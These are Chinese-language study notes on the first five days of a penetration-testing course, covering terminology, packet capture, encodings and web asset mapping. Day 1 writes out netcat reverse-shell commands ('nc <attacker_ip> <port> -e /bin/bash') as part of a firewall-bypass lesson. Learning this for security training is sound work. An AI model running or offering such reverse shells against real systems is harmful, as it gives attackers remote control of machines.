1

前言·

之前看过20年的小迪的一两集课程,没坚持下来,希望这次一定;一共178集(隔天一集),一集大概1个半小时,一共265小时

V2022-1版,与其盗版贩卖,不如公开学习,暂不提供课件环境资源等,请理解!

先生大义!

相比上一期120集有所增加

第1天:基础入门-操作系统&名词&文件·

参考链接:渗透测试常用术语总结 - 11阳光 - 博客园 (cnblogs.com)

比如POC等等大概理解作用但不知道其定义,不熟悉 验证 证明漏洞存在

EXP 利用 更关心

Payload :包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码

**shellcode **漏洞利用载荷/代码()

后门/webshell(web系统的后门)

木马(控制、操作、窃取)/病毒(破坏性)

反弹回显,跳板,黑白盒测试,ATT&CK

ATT&CK 渗透测试流程标准框架 专有名词 写报告用

操作系统

用途 个人&服务器用机Server

命令 Win&Linux命令

命令不会讲 自己学 挺好的,自己学过了 后期用的时候上网查即可

权限 文件 服务 用户

用户 系统级 用户组

防火墙 出入站策略协议 iptables WAF

案例1 文件上传下载–解决无图形化&数据传输·

Linux: wget curl python ruby perl java等

Windows:PowerShell

[~]#棱角 ::Edge.Forum* (ywhack.com)

渗透资源库 - WgpSec

进入对方服务器,只有命令行,如何下载准备好的脚本(己方服务器)~]#棱角 :文件下载命令快捷生成

哈哈,这个文件下载,和想象的黑客更接近了

案例2 反弹shell命令–解决数据回显&交互式问答·

执行命令有回显 显示执行结果

passwd user 提示输入密码

综合案例1 防火墙绕过–正向连接&反向连接&内网服务器·

外网有公网IP地址,而内网只在局域网内有效,故外网连接不到内网

nc 瑞士军刀

此时小迪演示的有三台机子:普通的内网win10,aliyun_小迪,小迪8

普通nc测试:普通的内网win10,aliyun_小迪(双向)

防火墙测试:aliyun_小迪,小迪8

以下是一个简单的反弹 shell 的示例过程(来自GPT):

  1. 攻击者在自己控制的服务器上启动 nc 监听一个指定的端口,等待目标计算机的连接。

    1
    nc -l -p <port>
  2. 攻击者在目标计算机上执行命令(给出cmd权限),连接到攻击者控制的服务器。

    1
    nc <attacker_ip> <port> -e /bin/bash
  3. 目标计算机上的 nc 连接到攻击者控制的服务器,并将目标计算机上的 shell(如 Bash)的输入和输出重定向到该连接中。

  4. 现在,攻击者可以在自己的服务器上执行命令,并将其发送到目标计算机上的 shell 中。这样,攻击者就可以远程控制目标计算机并执行各种操作。

在命令 ncat -e /bin/bash ip port 中,/bin/bash 的作用是指定要在目标计算机上执行的命令。加上 /bin/bash 表示要在目标计算机上启动一个交互式的 Bash shell。

如果省略 /bin/bash,则 ncat -e ip port 命令将在目标计算机上执行默认的命令解释器(通常是 /bin/sh/bin/dash)。这不会启动一个交互式的 shell,而是在连接建立后执行一个简单的命令解释器。-------(GPT)

防火墙:一般入站检测严格,出战宽松 所以nc作为攻击者的主机要关闭防火墙

nc -e cmd ip port ||| nc -lvvp port

正向是自己主动找别人,反向是别人主动连接你【相对概念】

学习记录3-正向连接&反向连接 - 一肚子回锅肉 - 博客园 (cnblogs.com)

反弹shell

最后展示了pikachu的实战 FOFA 看着实战 打开新大陆 哈哈

第2天:基础入门-Web应用&架构搭建·

先花了十几分钟介绍了一下域名和服务器的购买,跳过【网站搭建:域名,子域名,DNS,HTTPS,证书】

WEB架构:开发语言、程序源码(应用类型,开源CMS分类,开发框架)、中间件容器(IIS、Apache、Nginx、Tomcat)、数据库类型(Mysql,Oracle,db2,Redis)、服务器操作系统、第三方软件(phpMYADMIN)

哈哈,不讲啊不懂,讲啊浪费时间

WEB应用安全漏洞分类:

SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF、反序列化、逻辑越权、未授权访问、XXE/XML、弱口令安全

HTTP协议数据包简单总结 - cherry_cui - 博客园 (cnblogs.com)

通过新闻点赞按钮,引入抓包

只是禁止了浏览器的点赞,但是数据包的发送依旧有效(刷赞哈哈) 这个不需要用户登录

接下来打开了逍遥模拟器,讲解了由于UA造成的网站的不同呈现

看课的最大的好处,就是有学习路线和避免在细枝末节上耗费过多的时间

Burpsuite:浏览器-代理-服务器 127.0.0.1 8888

模拟器(相当于虚拟机,设置手动代理)用的是:192.168.1.9 自己的ip (物理机ip作为模拟器的出口)【桥接网卡 网段】

状态码 303 403

铸剑WebPathBrute 目录扫描 / Burp Intruder positions Payload Positions

快代理 远程代理 隧道代理 (封ip 薅羊毛)

好家伙 搭(建)网站听成了打网站

域名解析 例如:test.域名 设置指向的ip地址

第3天:基础入门-抓包&封包&协议&AP·

抓包 应用意义、对象、协议、支持

封包 应用意义

学会不同对象(ip、域名、应用程序)采用不同抓包封包抓取技术分析

  • 基于网络接口抓包
  • 基于程序进程抓包
  • 基于数据协议抓包–HTTP/S&TCP&UDP
  • 基于应用对象抓包-APP&小程序&PC_UI
  • 基于系统使用抓包–模拟器&WIN&LINUX

浏览器 审查-自带的Network 有相应数据包信息及资源信息(Web网页)

APP&小程序&PC抓包HTTP/S软件:Charles茶杯&Fiddler&BP

程序进程&网络接口&其他协议抓包:Wireshark&科来网络分析系统

通讯类应用封包分析发送接收:WPE四件套封包&科来网络分析系统

环境配置:

​ 安卓模拟器:逍遥

​ 工具证书配置(能抓HTTPS的网站) 找到以太网的ip地址

​ 封包抓取调试

Charles茶杯、Fiddler:模拟器;数据包需要筛选

Burp:实时点对点 类似上面格式的HTTP history;可以直接做安全测试

接下来又展示了微信小程序、PC软件的抓包

有些软件抓不到,其他协议 tcpdump无图形化界面,暂时讲课不讲,先使用无脑些的工具

Wireshark:需要了解过滤器

科来网络分析系统:能直接进程浏览器锁定到软件,协议分类

借用模拟器游戏的回城发包 引入封包监听工具 用于重复发送数据包 整体测试触发事件的数据包

CCProxy WPE

抓包目的:我还以为是分析、利用数据包;抓包应用的资产信息进行安全测试

抓包协议区别工具:有些不走HTTP/S,实现全局协议抓包

封包、抓包区别:零散和整体,封包能精确到每个操作的数据包

有些不是游戏加密,而是数据包反重发,反调试

第4天:基础入门-30余种加密编码进制·

案例:

md5在线解密破解,md5解密加密 (cmd5.com)

内网渗透神器(Mimikatz)——使用教程-CSDN博客

纯干货-内网渗透系列教程——NTLM 与 NTLM 身份认证 - 知乎 (zhihu.com)

识别加密算法/编码类型:

  1. 看加密方式:密文位数+密文特征(数字、字母、大小写、符号)
  2. 密文存放位置/加密对象(Web、数据库、操作系统)

应用:各类应用密文、自定义算法、代码分析、CTF

经过一道SQL注入题,主要是获得其中的PHP文件,观察编码特征,了解到了先要base64解码,然后AES解密(相关参数在代码中)

常见传输编码:

  • Base64(包括小写字母a-z、大写字母A-Z、数字0-9、符号"+“、”/"一共64个字符的字符集 可能=结尾)

  • URL(%0-9 a-f)

  • HEX(0-9,a-f)

  • ASCII(128位)

解密反编译工具:Zend&Dll&Jar

编码举例: 例如url上参数MQ== base64解码后为1 即id=1 || 目的:攻击者须根据加密规则构造Payload

如果在入门学习网络安全时,遇到一些名词或工具,应当去先搜索博客尽力搞懂吗(不影响此时内容的学习)

代码加密

​ 前端加密:JS颜文字、Jother ! + ( ) [ ] { }、JSFUCK 少了 { } 目的:版权保护

那如何解决二次开发的问题呢

​ 后端代码加密:

​ PHP:乱码 头部有信息 php免费在线解密-PHP在线解密 (dephp.net)

​ .NET:DLL封装代码文件 ILSpy工具

​ JAVA:JAR&CLASS文件

​ 工具:ILSpy、Zend、IDEA

数据库加密:mysql

显示编码:ANSI UTF-8 GBK

一道杂项 图片foremost 压缩包 颜文字aaencode

另一道 JSFUCK HTML里直接写的有

第5天:基础入门-资产架构&端口&应用·

资产架构:端口&目录&插件接口&多站点&多应用

  • WEB单个源码指向安全
  • WEB多个目录源码安全 www.domain/blog
  • WEB多个端口源码安全 www.domain:8081
  • 服务器架设多个站点安全 blog.domain
  • 架设第三方插件接口安全 web源码插件、应用(phpmyadmin:方便了数据库的管理和被攻击/FTP:文件操作、FTP协议攻击)
  • 服务器架设多个应用安全

番外安全:Aliyun&域名解析&云服务器&个人等

  • 基于域名解析安全 社工等方式窃取账号 密码
  • 基于服务器本身安全
  • 基于服务商信息安全
  • 基于管理个人的安全

看完之后感觉自己站起来了,能挖洞了,不是的,还有防护啊

又菜又懒

考虑阻碍:站库分离&部署防护&负载均衡&CDN等

  • 站库分离 数据库部署到另一个服务器上
  • CDN加速服务
  • 负载均衡 防止一台服务器的崩溃
  • 部署防护WAF应用防火墙

同一地区的网络宽带,有人下载过某个文件,另一个人再下的就是前一个的缓存,速度非常快;CDN本是为了解决网络通讯的数据问题(对于攻击者只是攻击的缓存,而非真实ip)

Nginx反向代理:内网的服务解析到外网服务器上 DNS 通讯